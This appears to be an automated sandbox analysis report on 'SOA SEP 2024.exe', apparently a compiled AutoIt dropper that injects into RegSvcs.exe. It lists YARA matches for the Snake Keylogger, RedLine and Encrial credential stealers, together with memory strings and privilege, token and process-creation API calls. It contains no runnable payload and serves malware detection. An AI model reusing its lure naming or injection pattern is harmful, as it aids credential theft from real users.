Source: 2.2.RegSvcs.exe.4176458.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.RegSvcs.exe.4176458.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.RegSvcs.exe.4176458.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.2.RegSvcs.exe.4176458.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 2.2.RegSvcs.exe.4175570.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.RegSvcs.exe.4175570.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.RegSvcs.exe.4175570.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.2.RegSvcs.exe.4175570.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 2.2.RegSvcs.exe.2ee5dce.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.RegSvcs.exe.2ee5dce.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.RegSvcs.exe.2ee5dce.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.2.RegSvcs.exe.2ee5dce.1.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 2.2.RegSvcs.exe.5750ee8.8.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.RegSvcs.exe.5750ee8.8.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.RegSvcs.exe.5750ee8.8.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.2.RegSvcs.exe.5750ee8.8.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 2.2.RegSvcs.exe.41a9590.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.RegSvcs.exe.41a9590.3.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.RegSvcs.exe.41a9590.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.2.RegSvcs.exe.41a9590.3.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 2.2.RegSvcs.exe.2ee5dce.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.RegSvcs.exe.2ee5dce.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.RegSvcs.exe.2ee5dce.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.2.RegSvcs.exe.2ee5dce.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000000.00000002.2102007208.00000000006C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000002.00000002.4555400632.0000000005750000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000002.00000002.4555400632.0000000005750000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000002.00000002.4555400632.0000000005750000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000002.00000002.4555400632.0000000005750000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000002.00000002.4552483120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000002.00000002.4555060395.0000000004171000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000002.00000002.4555060395.0000000004171000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000002.00000002.4555306563.0000000005650000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000002.00000002.4555306563.0000000005650000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000002.00000002.4555306563.0000000005650000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000002.00000002.4555306563.0000000005650000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000002.00000002.4553461018.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000002.00000002.4553461018.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: RegSvcs.exe PID: 1560, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: RegSvcs.exe PID: 1560, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\SOA SEP 2024.exe	Code function: This is a third-party compiled AutoIt script.	0_2_00763D19
Source: SOA SEP 2024.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: SOA SEP 2024.exe, 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_ae532dc0-1
Source: SOA SEP 2024.exe, 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: ySDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_9f3682b0-c
Source: SOA SEP 2024.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_2804b69f-a
Source: SOA SEP 2024.exe	String found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_199655e8-2

Source: C:\Users\user\Desktop\SOA SEP 2024.exe

Code function: 0_2_007A6606: CreateFileW,DeviceIoControl,CloseHandle,

0_2_007A6606

Source: C:\Users\user\Desktop\SOA SEP 2024.exe

Code function: 0_2_0079ACC5 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_0079ACC5

Source: C:\Users\user\Desktop\SOA SEP 2024.exe

Code function: 0_2_007A79D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_007A79D3

Source: C:\Users\user\Desktop\SOA SEP 2024.exe	Code function: 0_2_0078B043	0_2_0078B043
Source: C:\Users\user\Desktop\SOA SEP 2024.exe	Code function: 0_2_0079410F	0_2_0079410F
Source: C:\Users\user\Desktop\SOA SEP 2024.exe	Code function: 0_2_007802A4	0_2_007802A4
Source: C:\Users\user\Desktop\SOA SEP 2024.exe	Code function: 0_2_0076E3E3	0_2_0076E3E3
Source: C:\Users\user\Desktop\SOA SEP 2024.exe	Code function: 0_2_0079038E	0_2_0079038E
Source: C:\Users\user\Desktop\SOA SEP 2024.exe	Code function: 0_2_0079467F	0_2_0079467F
Source: C:\Users\user\Desktop\SOA SEP 2024.exe	Code function: 0_2_007806D9	0_2_007806D9
Source: C:\Users\user\Desktop\SOA SEP 2024.exe	Code function: 0_2_007CAACE	0_2_007CAACE
Source: C:\Users\user\Desktop\SOA SEP 2024.exe	Code function: 0_2_00794BEF	0_2_00794BEF
Source: C:\Users\user\Desktop\SOA SEP 2024.exe	Code function: 0_2_0078CCC1	0_2_0078CCC1
Source: C:\Users\user\Desktop\SOA SEP 2024.exe	Code function: 0_2_0076AF50	0_2_0076AF50
Source: C:\Users\user\Desktop\SOA SEP 2024.exe	Code function: 0_2_00766F07	0_2_00766F07
Source: C:\Users\user\Desktop\SOA SEP 2024.exe	Code function: 0_2_0077B11F	0_2_0077B11F
Source: C:\Users\user\Desktop\SOA SEP 2024.exe	Code function: 0_2_007C31BC	0_2_007C31BC
Source: C:\Users\user\Desktop\SOA SEP 2024.exe	Code function: 0_2_0078D1B9	0_2_0078D1B9
Source: C:\Users\user\Desktop\SOA SEP 2024.exe	Code function: 0_2_0079724D	0_2_0079724D
Source: C:\Users\user\Desktop\SOA SEP 2024.exe	Code function: 0_2_0078123A	0_2_0078123A
Source: C:\Users\user\Desktop\SOA SEP 2024.exe	Code function: 0_2_00773200	0_2_00773200
Source: C:\Users\user\Desktop\SOA SEP 2024.exe	Code function: 0_2_007693F0	0_2_007693F0
Source: C:\Users\user\Desktop\SOA SEP 2024.exe	Code function: 0_2_007A13CA	0_2_007A13CA
Source: C:\Users\user\Desktop\SOA SEP 2024.exe	Code function: 0_2_0077F563	0_2_0077F563
Source: C:\Users\user\Desktop\SOA SEP 2024.exe	Code function: 0_2_007AB6CC	0_2_007AB6CC
Source: C:\Users\user\Desktop\SOA SEP 2024.exe	Code function: 0_2_007696C0	0_2_007696C0
Source: C:\Users\user\Desktop\SOA SEP 2024.exe	Code function: 0_2_007CF7FF	0_2_007CF7FF
Source: C:\Users\user\Desktop\SOA SEP 2024.exe	Code function: 0_2_007677B0	0_2_007677B0
Source: C:\Users\user\Desktop\SOA SEP 2024.exe	Code function: 0_2_007979C9	0_2_007979C9
Source: C:\Users\user\Desktop\SOA SEP 2024.exe	Code function: 0_2_0077FA57	0_2_0077FA57
Source: C:\Users\user\Desktop\SOA SEP 2024.exe	Code function: 0_2_00773B70	0_2_00773B70
Source: C:\Users\user\Desktop\SOA SEP 2024.exe	Code function: 0_2_00769B60	0_2_00769B60
Source: C:\Users\user\Desktop\SOA SEP 2024.exe	Code function: 0_2_00767D19	0_2_00767D19
Source: C:\Users\user\Desktop\SOA SEP 2024.exe	Code function: 0_2_0077FE6F	0_2_0077FE6F
Source: C:\Users\user\Desktop\SOA SEP 2024.exe	Code function: 0_2_00789ED0	0_2_00789ED0
Source: C:\Users\user\Desktop\SOA SEP 2024.exe	Code function: 0_2_00767FA3	0_2_00767FA3
Source: C:\Users\user\Desktop\SOA SEP 2024.exe	Code function: 0_2_00D695C0	0_2_00D695C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_00408C60	2_2_00408C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0040DC11	2_2_0040DC11
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_00407C3F	2_2_00407C3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_00418CCC	2_2_00418CCC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_00406CA0	2_2_00406CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_004028B0	2_2_004028B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0041A4BE	2_2_0041A4BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_00418244	2_2_00418244
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_00401650	2_2_00401650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_00402F20	2_2_00402F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_004193C4	2_2_004193C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_00418788	2_2_00418788
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_00402F89	2_2_00402F89
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_00402B90	2_2_00402B90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_004073A0	2_2_004073A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_02DC12C0	2_2_02DC12C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_02DC12B0	2_2_02DC12B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_02DC1550	2_2_02DC1550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_02DC1560	2_2_02DC1560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06BA22A8	2_2_06BA22A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06BA6E98	2_2_06BA6E98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06BA67C8	2_2_06BA67C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06BAB4D8	2_2_06BAB4D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06BA229A	2_2_06BA229A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06BACA90	2_2_06BACA90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06BACA82	2_2_06BACA82
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06BACEE8	2_2_06BACEE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06BACEDC	2_2_06BACEDC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06BAC638	2_2_06BAC638
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06BAC62A	2_2_06BAC62A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06BA5E20	2_2_06BA5E20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06BA5E10	2_2_06BA5E10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06BAF600	2_2_06BAF600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06BAD798	2_2_06BAD798
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06BAD792	2_2_06BAD792
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06BADBF0	2_2_06BADBF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06BADBE4	2_2_06BADBE4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06BAA7D0	2_2_06BAA7D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06BAA7C0	2_2_06BAA7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06BAD330	2_2_06BAD330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06BA9F20	2_2_06BA9F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06BA9F0F	2_2_06BA9F0F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06BAA378	2_2_06BAA378
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06BAA36A	2_2_06BAA36A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06BAD340	2_2_06BAD340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06BAE4A0	2_2_06BAE4A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06BAE490	2_2_06BAE490
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06BAB080	2_2_06BAB080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06BAE8F8	2_2_06BAE8F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06BAE8E8	2_2_06BAE8E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06BAB4C8	2_2_06BAB4C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06BAE039	2_2_06BAE039
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06BAAC28	2_2_06BAAC28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06BAAC19	2_2_06BAAC19
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06BAB070	2_2_06BAB070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06BAE048	2_2_06BAE048
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06BA65A8	2_2_06BA65A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06BAF1A8	2_2_06BAF1A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06BAF198	2_2_06BAF198
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06BABD88	2_2_06BABD88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06BAF5F0	2_2_06BAF5F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06BAC1E0	2_2_06BAC1E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06BAC1D0	2_2_06BAC1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06BAB930	2_2_06BAB930
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06BAB920	2_2_06BAB920
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06BABD78	2_2_06BABD78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06BAED50	2_2_06BAED50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06BAED40	2_2_06BAED40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06BCA6B0	2_2_06BCA6B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06BCC6B0	2_2_06BCC6B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06BC5618	2_2_06BC5618
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06BC74A8	2_2_06BC74A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06BCAD18	2_2_06BCAD18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06BC9388	2_2_06BC9388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06BCB380	2_2_06BCB380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06BC7B00	2_2_06BC7B00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06BCA050	2_2_06BCA050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06BCC050	2_2_06BCC050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06BC0040	2_2_06BC0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06BC99F0	2_2_06BC99F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06BCB9E8	2_2_06BCB9E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06BC16B8	2_2_06BC16B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06BC16A7	2_2_06BC16A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06BCA6A0	2_2_06BCA6A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06BC5EF0	2_2_06BC5EF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06BC5EE1	2_2_06BC5EE1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06BC5608	2_2_06BC5608
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06BC67A0	2_2_06BC67A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06BC6790	2_2_06BC6790
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06BC44B8	2_2_06BC44B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06BC44A8	2_2_06BC44A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06BC7499	2_2_06BC7499
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06BC25D0	2_2_06BC25D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06BCAD0A	2_2_06BCAD0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06BC4D68	2_2_06BC4D68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06BC4D58	2_2_06BC4D58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06BC7AF0	2_2_06BC7AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06BC32D0	2_2_06BC32D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06BC5A70	2_2_06BC5A70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06BC5A60	2_2_06BC5A60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06BC2258	2_2_06BC2258
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06BC2247	2_2_06BC2247
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06BC6BF8	2_2_06BC6BF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06BC6BE9	2_2_06BC6BE9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06BC6339	2_2_06BC6339
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06BC9378	2_2_06BC9378
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06BCB370	2_2_06BCB370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06BC6348	2_2_06BC6348
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06BC4038	2_2_06BC4038
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06BC4028	2_2_06BC4028
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06BC7050	2_2_06BC7050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06BC7040	2_2_06BC7040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06BCA040	2_2_06BCA040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06BCC040	2_2_06BCC040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06BC51B1	2_2_06BC51B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06BC99E2	2_2_06BC99E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06BCB9D7	2_2_06BCB9D7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06BC51C0	2_2_06BC51C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06BC4910	2_2_06BC4910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06BC4900	2_2_06BC4900

Source: C:\Users\user\Desktop\SOA SEP 2024.exe	Code function: String function: 0077EC2F appears 68 times
Source: C:\Users\user\Desktop\SOA SEP 2024.exe	Code function: String function: 0078F8A0 appears 35 times
Source: C:\Users\user\Desktop\SOA SEP 2024.exe	Code function: String function: 00786AC0 appears 42 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 0040E1D8 appears 44 times

Source: SOA SEP 2024.exe, 00000000.00000003.2096072898.0000000003613000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs SOA SEP 2024.exe
Source: SOA SEP 2024.exe, 00000000.00000003.2097026105.00000000037BD000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs SOA SEP 2024.exe
Source: SOA SEP 2024.exe, 00000000.00000002.2102007208.00000000006C0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs SOA SEP 2024.exe

Source: SOA SEP 2024.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

